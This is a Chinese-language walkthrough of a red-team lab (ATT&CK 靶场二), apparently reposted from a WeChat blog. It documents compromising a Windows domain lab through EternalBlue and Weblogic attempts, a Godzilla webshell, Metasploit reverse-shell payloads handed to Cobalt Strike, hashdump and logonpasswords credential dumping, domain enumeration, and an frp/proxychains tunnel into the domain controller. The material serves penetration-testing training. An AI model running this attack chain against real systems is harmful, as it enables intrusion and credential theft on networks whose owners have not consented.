ATT&CK红队评估实战靶场二

admin 2024年12月6日15:43:59评论6 views字数 10499阅读34分59秒阅读模式

拓扑图

ATT&CK红队评估实战靶场二
image-20241205130334986

环境搭建

WEB.de1ay.com

delay通过默认密码登录不上去,可以使用webadministrator(密码为空)登录本机,再为delay账户重新设置为默认密码(1qaz@WSX)

HEU_KMS软件激活(选择重置windows)

netsh advfirewall show currentprofile查看防火墙状态->开启

启动weblogic(默认端口7001)C:OracleMiddlewareuser_projectsdomainsbase_domainstartWebLogic

netstat -an | findstr 7001正常运行

DC

默认密码(1qaz@WSX)

netsh advfirewall show currentprofile查看防火墙状态->开启

兼顾DC域&DNS服务器

PC

默认密码(1qaz@WSX)

netsh advfirewall show currentprofile查看防火墙状态->开启

外围打点

nmap -v -T4 -p- -A -oN ATT_02.log 192.168.30.131
#-v:
#-A:综合扫描
#-p-:全部端口
#-T4:扫描速度(相对较快)
#-v:详细信息
#-oN ATT_02.log:扫描结果保存
ATT&CK红队评估实战靶场二
image-20241205131758931

扫描结果

3389-远程桌面服务(RDP)

445-文件共享服务(SMB协议)

1433-Microsoft SQL Server 2008 R2 10.50.4000.00; SP2

7001-weblogic

OS:Windows Server 2008 R2 Standard

攻击思路

3389:暴力破解、端口漏洞利用、

445:永恒之蓝

7001:java架构漏洞

1433:searchsploit

searchsploit

-t标题

-m镜像到...

-w 脚本url网址

脚本镜像到本地

ATT&CK红队评估实战靶场二
image-20241205134315639

3389

检查模块,dos攻击蓝屏,不能拿到shell,不用这个模块攻击了

msf6 > search ms12-020 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/ms12_020_check . normal Yes MS12-020 Microsoft Remote Desktop Checker 1 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids msf6 > use 0 msf6 auxiliary(scanner/rdp/ms12_020_check) > options Module options (auxiliary/scanner/rdp/ms12_020_check): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 3389 yes Remote port running RDP (TCP) THREADS 1 yes The number of concurrent threads (max one per host) View the full module info with the info, or info -d command. msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.30.131 rhosts => 192.168.30.131 msf6 auxiliary(scanner/rdp/ms12_020_check) > run [+] 192.168.30.131:3389 - 192.168.30.131:3389 - The target is vulnerable. [*] 192.168.30.131:3389 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/rdp/ms12_020_check) >

445

msf6 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 _ target: Automatic Target . . . . 2 _ target: Windows 7 . . . . 3 _ target: Windows Embedded Standard 7 . . . . 4 _ target: Windows Server 2008 R2 . . . . 5 _ target: Windows 8 . . . . 6 _ target: Windows 8.1 . . . . 7 _ target: Windows Server 2012 . . . . 8 _ target: Windows 10 Pro . . . . 9 _ target: Windows 10 Enterprise Evaluation . . . . 10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 11 _ target: Automatic . . . . 12 _ target: PowerShell . . . . 13 _ target: Native upload . . . . 14 _ target: MOF upload . . . . 15 _ AKA: ETERNALSYNERGY . . . . 16 _ AKA: ETERNALROMANCE . . . . 17 _ AKA: ETERNALCHAMPION . . . . 18 _ AKA: ETERNALBLUE . . . . 19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 20 _ AKA: ETERNALSYNERGY . . . . 21 _ AKA: ETERNALROMANCE . . . . 22 _ AKA: ETERNALCHAMPION . . . . 23 _ AKA: ETERNALBLUE . . . . 24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection 25 _ AKA: DOUBLEPULSAR . . . . 26 _ AKA: ETERNALBLUE . . . . 27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution 28 _ target: Execute payload (x64) . . . . 29 _ target: Neutralize implant . . . . Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant' msf6 > use 0 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, W indows Embedded Standard 7 target machines. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windo ws Embedded Standard 7 target machines. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedde d Standard 7 target machines. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.30.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target View the full module info with the info, or info -d command. msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tc [-] The value specified for payload is not valid. msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.30.131 rhosts => 192.168.30.131 msf6 exploit(windows/smb/ms17_010_eternalblue) > msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.30.128:4444 [*] 192.168.30.131:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.30.131:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit) [*] 192.168.30.131:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.30.131:445 - The target is vulnerable. [*] 192.168.30.131:445 - Connecting to target for exploitation. [+] 192.168.30.131:445 - Connection established for exploitation. [+] 192.168.30.131:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.30.131:445 - CORE raw buffer dump (51 bytes) [*] 192.168.30.131:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 192.168.30.131:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard [*] 192.168.30.131:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac [*] 192.168.30.131:445 - 0x00000030 6b 20 31 k 1 [+] 192.168.30.131:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.30.131:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.30.131:445 - Sending all but last fragment of exploit packet [-] 192.168.30.131:445 - Errno::ECONNRESET: Connection reset by peer [*] Exploit completed, but no session was created.

360拦截

ATT&CK红队评估实战靶场二
image-20241205141250151

可以选择关闭360再次run

chcp 65001解决乱码问题

exit退出

background:会话放到后台

session:会话编号

session -i 会话编号#进入会话

session -k 会话编号#关闭会话

漏洞利用

7001

自动化工具

ATT&CK红队评估实战靶场二
image-20241205143101803

哥斯拉连接,拿到shell,进行信息收集,权限比较低

ATT&CK红队评估实战靶场二
image-20241205201001495

weblogic漏洞检测脚本

[*] =========Task Start=========
[+] [192.168.30.131:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.30.131:7001] Weblogic console address is exposed! The path is: http://192.168.30.131:7001/console/login/LoginForm.jsp
[+] [192.168.30.131:7001] Weblogic UDDI module is exposed! The path is: http://192.168.30.131:7001/uddiexplorer/
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2017-3506
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
ATT&CK红队评估实战靶场二
image-20241205201040493

CVE-2019-2725

未成功

ATT&CK红队评估实战靶场二
image-20241205201531489

可以看到weblogic版本为10.3.6.0

ATT&CK红队评估实战靶场二
image-20241205202525604

拿kali工具挨个打

ATT&CK红队评估实战靶场二
image-20241205202609204

结果发现没几个是能成功的,searchsploit -w weblogic 10.3.6.0打开网站,过滤下能用的发现只有44553可以,这个利用方法在另一篇文章已经写过,本篇不再复现

ATT&CK红队评估实战靶场二
image-20241205205518854

上线msf会话

续哥斯拉连接,跟着哥斯拉提示去输入,点击go,msf上线

ATT&CK红队评估实战靶场二
image-20241205210653395

提权

ATT&CK红队评估实战靶场二
image-20241205222020962

migrate 492 进程迁移到system权限进程

ATT&CK红队评估实战靶场二
image-20241205222202859

上线CS

ATT&CK红队评估实战靶场二
image-20241205180354751
ATT&CK红队评估实战靶场二
image-20241205180419710

新建监听器

ATT&CK红队评估实战靶场二
image-20241205211649279

团队服务器(攻击机:你的kali)就会开启8088端口

将msf会话传递给cs

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

 Id  Name  Type                     Information      Connection
 --  ----  ----                     -----------      ----------
 1         meterpreter x86/windows  WEBde1ay @ WEB  192.168.30.128:9999 -> 192.168.30.131:63910 (192.168.30.131)

msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.30.128
lhost => 192.168.30.128
msf6 exploit(windows/local/payload_inject) > set lport 8088
lport => 8088
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set PrependMigrate true
PrependMigrate => true
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > run

[*] Running module against WEB
[*] Spawned Notepad process 5080
[*] Injecting payload into 5080
[*] Preparing 'windows/meterpreter/reverse_http' for PID 5080
msf6 exploit(windows/local/payload_inject) >

成功上线

ATT&CK红队评估实战靶场二
image-20241205222423499

调整sleep时间

ATT&CK红队评估实战靶场二
image-20241205222442659

内网信息收集

执行系统命令,前面加shell

ATT&CK红队评估实战靶场二
image-20241205220634534

获取密码hashdump

ATT&CK红队评估实战靶场二
image-20241205220755655

抓取明文密码logonpasswords

ATT&CK红队评估实战靶场二
image-20241205221029993

查询域内其他用户shell net user /domain

ATT&CK红队评估实战靶场二
image-20241205221557534

查看域管理员用户shell net group "domain admins" /domain

ATT&CK红队评估实战靶场二
image-20241205221659764

查看域内主机shell net group "domain computers" /domain

ATT&CK红队评估实战靶场二
image-20241205221731351

查看域控制器shell net group "domain controllers" /domain

ATT&CK红队评估实战靶场二
image-20241205222550118

定位域控shell ping DC

ATT&CK红队评估实战靶场二
image-20241205222654064

内网扫描:portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024

ATT&CK红队评估实战靶场二
image-20241205224900541

域控:

DC 10.10.10.10

两台主机:

PC   10.10.10.201

WEB  10.10.10.128

域管理员:Administrator

其他用户:de1ay           Guest         krbtgt              mssql

frp部署

frpc放到内网所在机器上

frps放到公网IP机器上

frps:

[common]
bind_addr = 0.0.0.0 #服务端监听IP
bind_port = 7000 #服务端监听端口

[socks5]
type = tcp
remote_port = 1080 #socks5代理服务端口
plugin = socks5  #socks5代理插件
ATT&CK红队评估实战靶场二
image-20241205233749728

frpc:

[common]
server_addr = 192.168.30.128 #攻击端IP
server_port = 7000    #攻击端监听端口

[socks5]
type = tcp
remote_port = 1080    #socks5代理端口
plugin = socks5     #使用socks5代理插件

cs进行文件上传frpc.inifrpc.exe两个文件

kali的远程桌面连接去启动

ATT&CK红队评估实战靶场二
image-20241205234825310
ATT&CK红队评估实战靶场二
image-20241205235009072

此时kali也会建立1080端口

ATT&CK红队评估实战靶场二
image-20241205235055234

kali并没有10网段,此时去ping10.10.10.10域控,能够到达

ATT&CK红队评估实战靶场二
image-20241205235324696

proxychains部署

vim /etc/proxychains4.conf

文件末尾注释掉socks4,添加socks5 127.0.0.1 1080

ATT&CK红队评估实战靶场二
image-20241205235656478

这里我们不能连接到DC域控

ATT&CK红队评估实战靶场二
image-20241206000002242

而使用proxychains4就可以登录,但是没有登录界面

ATT&CK红队评估实战靶场二
image-20241206000140128

后面查了资料发现,rdesktop无网络级别身份验证

ATT&CK红队评估实战靶场二
image-20241206000635556

那我们使用xfreerdp连接,可以看到这边我们是正常的

proxychains4 xfreerdp /u:administrator /d:de1ay /p:1qaz@WSX /sec:rdp /v:10.10.10.10 /cert-ignore
ATT&CK红队评估实战靶场二
image-20241206001017421

全局代理proxychains4 bash

完结

原文始发于微信公众号(flowers-boy):ATT&CK红队评估实战靶场二

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月6日15:43:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ATT&CK红队评估实战靶场二https://cn-sec.com/archives/3473573.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息